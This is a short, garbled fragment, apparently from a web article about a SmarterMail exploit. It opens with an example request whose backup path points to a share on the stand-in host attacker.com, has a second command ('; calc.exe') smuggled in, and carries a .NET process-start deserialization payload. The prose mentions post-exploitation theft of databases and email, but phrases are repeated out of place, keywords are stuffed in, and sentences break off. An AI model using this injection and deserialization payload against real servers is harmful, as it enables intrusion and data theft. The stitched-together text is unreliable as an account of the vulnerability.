"command": "RestoreFromSharedPath", "backupPath": "\\attacker.com\share\backup.zip; calc.exe", "options": "deserialize": "__type=System.Diagnostics.Process+StartInfo, System, Version=4.0.0.0 ..."
Once the attacker has execution power, they can dump user databases, read private emails, or use the mail server as a jumping-off point to move laterally through the rest of the corporate network. How the Exploit Works (High-Level) smartermail 6919 exploit
: Improving how the application handles serialized data to prevent arbitrary command execution. Related Security Issues they can dump user databases
The SmarterMail 6919 exploit underscores three timeless truths: read private emails